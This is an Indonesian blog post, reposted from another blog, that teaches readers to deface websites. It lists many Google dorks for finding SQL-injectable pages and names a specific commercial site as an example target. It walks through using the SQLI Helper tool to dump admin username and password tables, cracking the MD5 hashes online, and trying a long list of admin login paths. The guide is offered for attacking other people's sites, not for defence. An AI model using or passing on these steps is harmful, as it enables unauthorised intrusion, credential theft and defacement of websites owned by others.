Deface Web Sederhana (Hack)

Cara Singkat Deface Website Dengan Tools SQLI Helper (Upgrade).

Langkah pertama, download tools SQLI Helper V 2.7 =KLIK HERE=


Langkah Kedua, Mencari Website
Kita harus mencari url yang bisa di hack. Bagaimana cara dapetin url seperti itu gimana? mudah kok….!! Dengan bantuan Google, apapun yang kita cari bisa kita dapatkan. Kita hanya menuliskan Dork ke dalam penelusuran Google.





Kumpulan perintah Google dorkscript dork SQL injection :


inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

Maka akan muncul seribu satu macam website yang url-nya mirip seperti yang saya contohkan diatas. Sebenarnya masih banyak script atau dork SQL yang bisa kita dapatkan di internet. Nanti di artikel berikutnya, saya akan coba memberikannya secara lengkap untuk anda.

Langkah Ketiga, Attack
Sebelum memulai attacker kita harus menemukan website yang bisa di hack. Dari ribuan website dari dork tersebut, belum tentu salah satunya yang bisa di hack. Untuk mengetahuinya kita harus memberi tanda petik di akhir alamat website
Contoh: http://www.wheelieboymotorsports.com/product_detail.php?pid=316 menjadi http://www.wheelieboymotorsports.com/product_detail.php?pid=316'. Jika terdapat tulisan
Query failed.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname. Atau Sebagainya yang mirip.  
Berarti Website tersebut bisa di hack.
Copy Url yang kamu dapatkan tadi ke kolom target.
Contoh: http://www.wheelieboymotorsports.com/product_detail.php?pid=316. (tidak pakai tanda petik)


Kemudian klik Inject. Maka secara otomatis dia akan memeriksa ulang apakah url tersebut vuln atau tidak, versi database, supports union, dll. Jika Inject berhasil akan muncul tampilan seperti ini.


Kalau sudah klik Get Database.
*Di contoh muncul 2 Database name. Information schema dan natural. Pilih database selain Information schema. Seperti contoh dibawah, saya memilih database natural. Selanjutnya klik Get Tables.


Akan muncul beberapa list Tables yang ada. Sekarang tugas kita tinggal mencari tabel yang berisikan username dan password administratornya. Biasanya nama tabelnya tidak jauh-jauh dari admin_user, admin_login, atau apapun yang berbau informasi login admin.


Langkah Keempat, Kolom Sql
Jika sudah pilih User kalian klik get Coloumns.
Di Coloumns block yang usr_login dan usr_pass atau user_name dan password_admin lalu klik Dump Now.


Setelah itu akan muncul tampilan seperti ini


Pilih salah satu dari user login dan user password tersebut.

*Ada yang aneh?? Password yang ditampilkan bentuknya seperti ini ya?
987d29241cc4f2a7465f2d9356ab3615
987d29241cc4f2a7465f2d9356ab3615

Langkah Kelima, Md5 Password
Password tersebut dienkripsi dengan menggunakan metode MD5. Jadi kita harus menterjemahkan kode tersebut menjadi password yang sebenarnya. Nah, bagaimana caranya?

Caranya cukup mudah, buka saja situs md5crack.com, lalu masukkan kode tersebut di kotak penelusuran. Berdoa saja password anda tersebut cukup lemah, sehingga bisa dipecahkan dengan metode brute force. Setelah anda masukkan, lalu klik Crack hash baby.

Selesai. sekarang cari halaman login atau adminnya.
Ada beberapa halaman login yang bisa kamu pakai (coba satu satu)

Kumpulan halaman admin SQL injection :
http://target.com/admin1.php/
http://target.com/admin1.html
http://target.com/admin2.php
http://target.com/admin2.html
http://target.com/yonetim.php
http://target.com/yonetim.html
http://target.com/yonetici.php
http://target.com/yonetici.html
http://target.com/adm/
http://target.com/admin/
http://target.com/admin/account.php
http://target.com/admin/account.html
http://target.com/admin/index.php
http://target.com/admin/index.html
http://target.com/admin/login.php
http://target.com/admin/login.html
http://target.com/admin/home.php
http://target.com/admin/controlpanel.html
http://target.com/admin/controlpanel.php
http://target.com/admin.php
http://target.com/admin.html
http://target.com/admin/cp.php
http://target.com/admin/cp.html
http://target.com/cp.php
http://target.com/cp.html
http://target.com/administrator/
http://target.com/administrator/index.html
http://target.com/administrator/index.php
http://target.com/administrator/login.html
http://target.com/administrator/login.php
http://target.com/administrator/account.html
http://target.com/administrator/account.php
http://target.com/administrator.php
http://target.com/administrator.html
http://target.com/login.php
http://target.com/login.html
http://target.com/modelsearch/login.php
http://target.com/moderator.php
http://target.com/moderator.html
http://target.com/moderator/login.php
http://target.com/moderator/login.html
http://target.com/moderator/admin.php
http://target.com/moderator/admin.html
http://target.com/moderator/
http://target.com/account.php
http://target.com/account.html
http://target.com/controlpanel/
http://target.com/controlpanel.php
http://target.com/controlpanel.html
http://target.com/admincontrol.php
http://target.com/admincontrol.html
http://target.com/adminpanel.php
http://target.com/adminpanel.html
http://target.com/admin1.asp
http://target.com/admin2.asp
http://target.com/yonetim.asp
http://target.com/yonetici.asp
http://target.com/admin/account.asp
http://target.com/admin/index.asp
http://target.com/admin/login.asp
http://target.com/admin/home.asp
http://target.com/admin/controlpanel.asp
http://target.com/admin.asp
http://target.com/admin/cp.asp
http://target.com/cp.asp
http://target.com/administrator/index.asp
http://target.com/administrator/login.asp
http://target.com/administrator/account.asp
http://target.com/administrator.asp
http://target.com/login.asp
http://target.com/modelsearch/login.asp
http://target.com/moderator.asp
http://target.com/moderator/login.asp
http://target.com/moderator/admin.asp
http://target.com/account.asp
http://target.com/controlpanel.asp
http://target.com/admincontrol.asp
http://target.com/adminpanel.asp
http://target.com/fileadmin/
http://target.com/fileadmin.php
http://target.com/fileadmin.asp
http://target.com/fileadmin.html
http://target.com/administration/
http://target.com/administration.php
http://target.com/administration.html
http://target.com/sysadmin.php
http://target.com/sysadmin.html
http://target.com/phpmyadmin/
http://target.com/myadmin/
http://target.com/sysadmin.asp
http://target.com/sysadmin/
http://target.com/ur-admin.asp
http://target.com/ur-admin.php
http://target.com/ur-admin.html
http://target.com/ur-admin/
http://target.com/Server.php
http://target.com/Server.html
http://target.com/Server.asp
http://target.com/Server/
http://target.com/wp-admin/
http://target.com/administr8.php
http://target.com/administr8.html
http://target.com/administr8/
http://target.com/administr8.asp
http://target.com/webadmin/
http://target.com/webadmin.php
http://target.com/webadmin.asp
http://target.com/webadmin.html
http://target.com/administratie/
http://target.com/admins/
http://target.com/admins.php
http://target.com/admins.asp
http://target.com/admins.html
http://target.com/administrivia/
http://target.com/Database_Administration/
http://target.com/WebAdmin/
http://target.com/useradmin/
http://target.com/sysadmins/
http://target.com/admin1/
http://target.com/system-administration/
http://target.com/administrators/
http://target.com/pgadmin/
http://target.com/directadmin/
http://target.com/staradmin/
http://target.com/ServerAdministrator/
http://target.com/SysAdmin/
http://target.com/administer/
http://target.com/LiveUser_Admin/
http://target.com/sys-admin/
http://target.com/typo3/
http://target.com/panel/
http://target.com/cpanel/
http://target.com/cPanel/
http://target.com/cpanel_file/
http://target.com/platz_login/
http://target.com/rcLogin/
http://target.com/blogindex/
http://target.com/formslogin/
http://target.com/autologin/
http://target.com/support_login/
http://target.com/meta_login/
http://target.com/manuallogin/
http://target.com/simpleLogin/
http://target.com/loginflat/
http://target.com/utility_login/
http://target.com/showlogin/
http://target.com/memlogin/
http://target.com/members/
http://target.com/login-redirect/
http://target.com/sub-login/
http://target.com/wp-login/
http://target.com/login1/
http://target.com/dir-login/
http://target.com/login_db/
http://target.com/xlogin/
http://target.com/smblogin/
http://target.com/customer_login/
http://target.com/UserLogin/
http://target.com/login-us/
http://target.com/acct_login/
http://target.com/admin_area/
http://target.com/bigadmin/
http://target.com/project-admins/
http://target.com/phppgadmin/
http://target.com/pureadmin/
http://target.com/sql-admin/
http://target.com/radmind/
http://target.com/openvpnadmin/
http://target.com/wizmysqladmin/
http://target.com/vadmind/
http://target.com/ezsqliteadmin/
http://target.com/hpwebjetadmin/
http://target.com/newsadmin/
http://target.com/adminpro/
http://target.com/Lotus_Domino_Admin/
http://target.com/bbadmin/
http://target.com/vmailadmin/
http://target.com/Indy_admin/
http://target.com/ccp14admin/
http://target.com/irc-macadmin/
http://target.com/banneradmin/
http://target.com/sshadmin/
http://target.com/phpldapadmin/
http://target.com/macadmin/
http://target.com/administratoraccounts/
http://target.com/admin4_account/
http://target.com/admin4_colon/
http://target.com/radmind-1/
http://target.com/Super-Admin/
http://target.com/AdminTools/
http://target.com/cmsadmin/
http://target.com/SysAdmin2/
http://target.com/globes_admin/
http://target.com/cadmins/
http://target.com/phpSQLiteAdmin/
http://target.com/navSiteAdmin/
http://target.com/server_admin_small/
http://target.com/logo_sysadmin/
http://target.com/server/
http://target.com/database_administration/
http://target.com/power_user/
http://target.com/system_administration/
http://target.com/ss_vms_admin_sm/ 
DIKUTIP DARI :

http://all-cyber.blogspot.com/2012/02/deface-web-sederhana-hack.html

0 comments:

Post a Comment

 

Belajar Dan Berbagi Copyright © 2011-2012 | Powered by Blogger